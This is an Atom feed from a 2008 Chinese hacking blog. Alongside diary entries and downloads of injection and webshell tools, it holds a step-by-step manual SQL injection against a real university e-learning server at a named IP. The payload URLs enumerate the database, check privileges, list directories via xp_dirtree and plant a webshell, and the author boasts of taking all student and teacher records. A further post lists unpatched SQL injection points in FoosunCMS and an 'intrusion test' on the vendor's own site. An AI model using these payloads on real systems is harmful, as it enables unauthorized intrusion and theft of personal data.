<?xml version="1.0" encoding="UTF-8"?>
  <feed xmlns="http://www.w3.org/2005/Atom">
  <title type="html"><![CDATA[许云风's BLOG]]></title>
  <subtitle type="html"><![CDATA[在大多数人关注你飞的高不高的时候,很少有人去关注你飞的累不累！]]></subtitle>
  <id>http://www.xuyunfeng.com.cn/</id>
  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/" /> 
  <link rel="self" type="application/atom+xml" href="http://www.xuyunfeng.com.cn/atom.asp" /> 
  <generator uri="http://www.pjhome.net/" version="2.8">PJBlog3</generator> 
  <updated>2008-06-15T16:19:32+08:00</updated>

  <entry>
	  <title type="html"><![CDATA[关于博客说明]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=6" label="我的日志" /> 
	  <updated>2008-06-15T16:19:32+08:00</updated>
	  <published>2008-06-15T16:19:32+08:00</published>
		  <summary type="html"><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="font-size:14pt;line-height:100%;"><span style="color:Red">&nbsp;&nbsp; 对不起朋友们,最近因为工作原因不能更新博客,有的朋友说软件不能下载,<br/>可以在网上搜索一下嘛!<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 可能明年才有时间来管理博客了! </span></span>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=203" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=203</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[感谢中国知音的建议]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=6" label="我的日志" /> 
	  <updated>2008-05-04T16:51:21+08:00</updated>
	  <published>2008-05-04T16:51:21+08:00</published>
		  <summary type="html"><![CDATA[今天知音给我说了MSSQL Injection Tools V 1.0的一些不足之处,写的很详细,很感谢他的建议,<br/>下次改软件的时候,一定改进!!<br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0805/u200854165119.jpg" border="0" alt=""/><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=202" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=202</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[黑鹰VIP专用WebShell生成器]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=7" label="我的作品" /> 
	  <updated>2008-04-25T06:01:15+08:00</updated>
	  <published>2008-04-25T06:01:15+08:00</published>
		  <summary type="html"><![CDATA[以前很多黑鹰的朋友问我工具怎么还没发出去,现在已经发出去了,你们可以去下了！<br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/320084256041.jpg" border="0" alt=""/><br/><br/><a href="http://dx.3800hk.com/vipdown/vipdown/v09/200804/22706.html" target="_blank" rel="external">http://dx.3800hk.com/vipdown/vipdown/v09/200804/22706.html</a>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=201" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=201</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[无聊]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=6" label="我的日志" /> 
	  <updated>2008-04-25T01:16:54+08:00</updated>
	  <published>2008-04-25T01:16:54+08:00</published>
		  <summary type="html"><![CDATA[有时候,怀疑自己是不是还生活在这个世上,每天都承受寂寞,天天对着注定要跟我一生的朋友,其他的朋友,<br/>都认为我过得好,很逍遥,很自在，什么也不用愁，也不用担心什么，其实他们没有想过天天对着代码是什么<br/>感受，在学校的压力很大，不知道该何去何从，经常迷失方向，一些还追着加我，说这个软件不能用，那个<br/>软件不能用，他们都不知道我测试软件花了很多时间，不能用怎么会发出去，虽然也会有很多BUG，但都是<br/>测试后改过的，还围到软件不能下载，而埋怨我，不知道我说了好多次，以前放软件的服务器删了，可以到<br/>网上去搜索一下，就可以了，烦啊！]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=200" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=200</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[MSSQL Injection Tools V 1.0]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=7" label="我的作品" /> 
	  <updated>2008-04-21T00:42:11+08:00</updated>
	  <published>2008-04-21T00:42:11+08:00</published>
		  <summary type="html"><![CDATA[<img src="http://www.xuyunfeng.com.cn/attachments/month_0804/m200842104113.jpg" border="0" alt=""/><br/><div id="mdown_fbt4mz9wci"></div><br /><script language="javascript" type="text/javascript">doAjax('?action=type1&mainurl=attachments%2Fmonth%5F0804%2Fm200842174948%2Erar&main=%E7%82%B9%E5%87%BB%E4%B8%8B%E8%BD%BD%E6%AD%A4%E6%96%87%E4%BB%B6','mdown_fbt4mz9wci');</script><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=199" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=199</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[拿电子科大网络学堂手工注入(新手篇)]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=11" label="技术文章" /> 
	  <updated>2008-04-18T23:07:48+08:00</updated>
	  <published>2008-04-18T23:07:48+08:00</published>
		  <summary type="html"><![CDATA[很多朋友都说我拿站就只有图,现在写一个简单的过程!<br/>没什么技术含量,别见笑!呵呵,开始了,1.先判断是否存在注入:在地址后面打上&#39;<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048&#39;</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/1.jpg" border="0" alt=""/><br/>有防注入系统,限制了我的IP,现在就可以用COOKIES注入器<br/>进入注入:<br/><br/><img src="http://www.xuyunfeng.com.cn/tupian/2.jpg" border="0" alt=""/><br/>填写相应信息,生成1.asp,放到我服务器上次,地址是:<a target="_blank" href="http://www.xuyunfeng.com.cn/1.asp" rel="external">http://www.xuyunfeng.com.cn/1.asp</a><br/>加上参数为:<a target="_blank" href="http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048" rel="external">http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048</a><br/>现在尝试注入;<a target="_blank" href="http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048&#39;" rel="external">http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048&#39;</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/3.jpg" border="0" alt=""/><br/>提示出错,试了一下不能注入,到了这里一般的朋友都放弃了,现在我们回到原来的注入点<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a>一:暴数据库信息:<br/>1.判断数据库名:<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048&#39;%20and%20db_name()&gt;0%20and%20&#39;&#39;=&#39;</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/4.jpg" border="0" alt=""/><br/>暴出数据库名为:wlxt<br/>2.判断数据库用户名:<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048&#39;%20and%20user&gt;0%20and%20&#39;&#39;=&#39;</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/5.jpg" border="0" alt=""/><br/>数据库名为:wlxt136<br/>3.判断数据库权限:<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048&#39;%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20and%20&#39;&#39;=&#39;</a><br/><a target="_blank" href="http://www.xuyunfeng.com.cn/tupian/5.jpg" rel="external"><img src="http://www.xuyunfeng.com.cn/tupian/6.jpg" border="0" alt=""/></a><br/>暴出用户权限是:DB的,DB权限可以列目录，现在我们来列网站目录<br/>二:列网站目录<br/>1.创建表:xuyunfeng列C盘的文件和目录<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;;Dro&#112;%20TABLE%20xuyufeng;Cr&#101;ate%20TABLE%20xuyunfeng(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Ins&#101;rt%20xuyunfeng%20exec%20master..xp_dirtree%20&#34;C:\&#34;,%201,1--<br/><img src="http://www.xuyunfeng.com.cn/tupian/7.jpg" border="0" alt=""/><br/>提示防注入系统,不用管它,创建表成功<br/>2:暴出C盘的文件和目录个数<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;%20And%20(Sel&#101;ct%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20xuyunfeng)=0%20%20and%20&#39;&#39;=&#39;<br/><img src="http://www.xuyunfeng.com.cn/tupian/8.jpg" border="0" alt=""/><br/>暴出一共有13个目录和文件<br/>3.列出第一个文件和目录(目录前面有0)<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;%20And%20(Sel&#101;ct%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Sel&#101;ct%20Top%201%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20&#39;&#39;=&#39;<br/><img src="http://www.xuyunfeng.com.cn/tupian/9.jpg" border="0" alt=""/><br/>第一个目录为:ASFRoot<br/>4:列出第二个文件或目录:<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;%20And%20(Sel&#101;ct%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Sel&#101;ct%20Top%202%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20&#39;&#39;=&#39;<br/><img src="http://www.xuyunfeng.com.cn/tupian/10.jpg" border="0" alt=""/><br/>第二个目录名为:Config.Msi<br/>5.列第三个文件或目录名:<br/><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external"><a href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" target="_blank" rel="external">http://218.6.168.52/wlxt/listcourse.asp?courseid=0048</a></a></a></a></a>&#39;%20And%20(Sel&#101;ct%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Sel&#101;ct%20Top%203%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20&#39;&#39;=&#39;<br/><img src="http://www.xuyunfeng.com.cn/tupian/11.jpg" border="0" alt=""/><br/>第三个目录为:Documents and Settings<br/>依次这样列出C盘的所有目录和文件,依次可以列所网站的所有目录和文件,从而找到网站<br/>我已经找到了:d:\webroot\wlxt\现在拿到数据库的信息和网站目录,现在可以通过数据库备份<br/>写上一句话木马:<br/>三:上传木马:<br/>1.用到工具,DB备份工具<br/><img src="http://www.xuyunfeng.com.cn/tupian/12.jpg" border="0" alt=""/><br/>把得到的信息写到软件里,依次点击备份,不要管提示,我们看是否成功!<br/><a target="_blank" href="http://www.xuyunfeng.com.cn/ok.asp" rel="external"><img src="http://www.xuyunfeng.com.cn/tupian/13.jpg" border="0" alt=""/></a><br/>备份成功了，现在用一个免杀大马<br/><img src="http://www.xuyunfeng.com.cn/tupian/14.jpg" border="0" alt=""/><br/><img src="http://www.xuyunfeng.com.cn/tupian/15.jpg" border="0" alt=""/><br/>点&#34;给我冲进去&#34;看是否成功!<br/><a target="_blank" href="http://218.6.168.52/wlxt/listcourse.asp?courseid=0048" rel="external">http://218.6.168.52/wlxt</a><a target="_blank" href="http://www.xuyunfeng.com.cn/help.asp" rel="external">/help.asp</a><br/><img src="http://www.xuyunfeng.com.cn/tupian/16.jpg" border="0" alt=""/><br/>成功了,输入密码进入!<br/><img src="http://www.xuyunfeng.com.cn/tupian/17.jpg" border="0" alt=""/><br/>我们成功拿到webshell,结束了这次检测!<br/><img src="http://www.xuyunfeng.com.cn/tupian/18.jpg" border="0" alt=""/><br/>我用工具拿到了整个数据库:包括所有学生和所有老师的信息,上面是所有老师的信息,但我们不能触犯法律,只是起技术的研究,有些并不是完全相同,好就到这了!<br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=198" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=198</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[郁闷]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=6" label="我的日志" /> 
	  <updated>2008-04-15T04:45:31+08:00</updated>
	  <published>2008-04-15T04:45:31+08:00</published>
		  <summary type="html"><![CDATA[今天真是郁闷, 上周买了个80个G的移动硬盘,本想是来备份数据的,都放了40多个G的文件在上面了<br/>,我的软件全在上面,今天想用PG多格一个盘出来,没想到,我却一下点错了,整个移动硬盘的数据全没<br/>了,真的气人,看来还是光盘安全!!!]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=197" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=197</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[云风SQL连接器]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=7" label="我的作品" /> 
	  <updated>2008-04-13T10:05:12+08:00</updated>
	  <published>2008-04-13T10:05:12+08:00</published>
		  <summary type="html"><![CDATA[<img src="http://www.xuyunfeng.com.cn/attachments/month_0804/f200841310143.jpg" border="0" alt=""/><br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/q200841310154.jpg" border="0" alt=""/><br/><div id="mdown_m4wu3uszi5"></div><br /><script language="javascript" type="text/javascript">doAjax('?action=type1&mainurl=attachments%2Fmonth%5F0804%2F02008414163439%2Erar&main=%E7%82%B9%E5%87%BB%E4%B8%8B%E8%BD%BD%E6%AD%A4%E6%96%87%E4%BB%B6','mdown_m4wu3uszi5');</script><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=196" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=196</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[风讯的产品,你还敢用吗?]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=11" label="技术文章" /> 
	  <updated>2008-04-06T05:59:44+08:00</updated>
	  <published>2008-04-06T05:59:44+08:00</published>
		  <summary type="html"><![CDATA[作者：jannock<br/><br/>今日来分析一下风讯的产品的安全性。<br/>风讯管方最新下载，FoosunCMSv4.0sp5完整版(含模板)。安装后，查看了一下代码，发现多处SQL 注入。不由心地发出一句：这样的产品，你敢用吗？<br/>对于ASP版。 <br/>1、漏洞文件<br/><br/>/User/i_Blog/Public_Save.asp <br/>38行 p_FileName = Request.Form(&#34;FileName&#34;) <br/>53行 set rstf = User_Conn.execute(&#34;sel&#101;ct FileName,FileExtName From FS_ME_Infoilog wh&#101;re UserNumber=&#39;&#34; <br/>s_User.UserNumber&#34;&#39; and FileName=&#39;&#34;&amp;p_FileName&#34;&#39; and FileExtName=&#39;&#34;&amp;P_FileExtName&#34;&#39;&#34;)<br/><br/>变量没有过虑就进入数据库查询<br/>测试方法<br/><a href="http://localhost/User/i_Blog/PublicLog.asp" target="_blank" rel="external">http://localhost/User/i_Blog/PublicLog.asp</a><br/><br/>在文件名那输入 test&#39; 保存后出现<br/><br/>Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) <br/>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 &#39;UserNumber=&#39;290149F916J&#39; and FileName=&#39;test&#39;&#39; and FileExtName=&#39;html&#39;&#39; 中。 <br/><br/>/User/i_Blog/Public_Save.asp, 第 53 行<br/><br/>2、漏洞文件<br/><br/>/user/Reg_Contact.asp<br/><br/>51 p_C_Name = Request.Form(&#34;C_Name&#34;) <br/>85 AddCorpDataTFObj.open &#34;sel&#101;ct C_Name From FS_ME_CorpUser wh&#101;re C_Name = &#39;&#34;&amp; <br/> p_C_Name &#34;&#39;&#34;,User_Conn,1,3<br/><br/>也明显存在sql注入漏洞<br/> <br/><br/>40 p_RealName = Replace(Request.Form(&#34;RealName&#34;),&#34;&#39;&#39;&#34;,&#34;&#34;) <br/>115 AddUserDataTFObj.open &#34;sel&#101;ct UserName,Email From FS_ME_Users wh&#101;re UserName <br/> = &#39;&#34;&amp; p_UserName_1 &#34;&#39;&#34;,User_Conn,1,3<br/><br/><br/>sql注入漏洞<br/> <br/><br/>3、user/Photo_Class.asp <br/>26 rs.open &#34;sel&#101;ct title,id,UserNumber From FS_ME_PhotoClass wh&#101;re <br/> title=&#39;&#34;&amp;trim(Request.Form(&#34;title&#34;))&#34;&#39; and UserNumber=&#39;&#34;&amp;Fs_User.UserNumber&#34;&#39;&#34;,User_Conn,1,3<br/><br/>title 没有过虑就直接进入数据库<br/>测试方法<br/><a href="http://localhost/user/Photo_Class.asp?Action=add" target="_blank" rel="external">http://localhost/user/Photo_Class.asp?Action=add</a><br/> <br/><br/>在相册分类名称那加入SQL注入语句 test&#39; <br/>Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) <br/>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 &#39;title=&#39;test&#39;&#39; and UserNumber=&#39;290149F916J&#39;&#39; 中。 <br/><br/>/user/Photo_Class.asp, 第 26 行<br/><br/>4、Order_Pay.asp<br/> <br/><br/>14 User_Conn.execute(&#34;Del&#101;te From FS_ME_Order wh&#101;re o&#114;derNumber=&#39;&#34;&amp; <br/>equest.QueryString(&#34;OrderNumber&#34;)&#34;&#39; and UserNumber=&#39;&#34;&amp; Fs_User.UserNumber &#34;&#39;&#34;)<br/><br/>o&#114;derNumber 没有过虑<br/>测试方法<br/><a href="http://localhost/User/Order_Pay.asp?action=lock_order" target="_blank" rel="external">http://localhost/User/Order_Pay.asp?action=lock_order</a>&amp;OrderNumber=4&amp;#39;<br/> <br/><br/>Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) <br/>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 &#39;OrderNumber=&#39;4&#39;&#39; and UserNumber=&#39;290149F916J&#39;&#39; 中。 <br/><br/>/User/Order_Pay.asp, 第 14 行<br/><br/>5、OpenCorp.asp<br/> <br/><br/>39 p_C_Name = Request.Form(&#34;C_Name&#34;) <br/>62 AddCorpDataTFObj.open &#34;sel&#101;ct C_Name From FS_ME_CorpUser wh&#101;re <br/> C_Name = &#39;&#34;&amp; p_C_Name &#34;&#39; and usernumber&lt;&gt;&#39;&#34;&amp;session(&#34;fS_usernumber&#34;)&#34;&#39;&#34;,User_Conn,1,3<br/><br/>6、Message_box.asp<br/><br/>29 DelID = request.Form(&#34;MessageID&#34;) <br/>35 User_Conn.execute(&#34;Del&#101;te From FS_ME_Message wh&#101;re MessageId in (&#34;&amp;DelID&#34;) <br/> and M_ReadUserNumber =&#39;&#34;&amp; Fs_User.UserNumber&#34;&#39;&#34;)<br/><br/>随便一看，就SQL注入就那么多。其它的漏洞呢？<br/>一个SQL注入漏洞就能把网站黑掉。晕。。这样的系统还敢用吗？<br/><br/>对于最新的.net 版 风讯dotNETCMS v1.0<br/>随便看了一下，也存在很严重的漏洞<br/>editor\editor\filemanager\connectors\aspx<br/>connector.aspx<br/>upload.aspx<br/>这两个文件都存在上传漏洞。<br/>很容易上传木马<br/><br/>下面是对风讯管方网站的入侵测试<br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/120084655848.JPG" border="0" alt=""/><br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/72008465598.jpg" border="0" alt=""/><br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/v20084655930.jpg" border="0" alt=""/><br/><br/>不敢用风讯系统了吧？（注：以上只是本人友情测试）<br/><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=195" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=195</id>
  </entry>	
		
  <entry>
	  <title type="html"><![CDATA[密码转换工具]]></title>
	  <author>
		 <name>许云风</name>
		 <uri>http://www.xuyunfeng.com.cn/</uri>
		 <email>xuyunfeng@xuyunfeng.com.cn</email>
	  </author>
	  <category term="" scheme="http://www.xuyunfeng.com.cn/default.asp?cateID=7" label="我的作品" /> 
	  <updated>2008-04-06T05:09:07+08:00</updated>
	  <published>2008-04-06T05:09:07+08:00</published>
		  <summary type="html"><![CDATA[注入时遇到加过密的密码,可以转换!<br/><img src="http://www.xuyunfeng.com.cn/attachments/month_0804/12008465715.jpg" border="0" alt=""/><br/><div id="mdown_11o1pila33"></div><br /><script language="javascript" type="text/javascript">doAjax('?action=type1&mainurl=attachments%2Fmonth%5F0804%2Fk2008465848%2Erar&main=%E7%82%B9%E5%87%BB%E4%B8%8B%E8%BD%BD%E6%AD%A4%E6%96%87%E4%BB%B6','mdown_11o1pila33');</script><br/>]]></summary>
	  <link rel="alternate" type="text/html" href="http://www.xuyunfeng.com.cn/article.asp?id=194" /> 
	  <id>http://www.xuyunfeng.com.cn/default.asp?id=194</id>
  </entry>	
		
</feed>
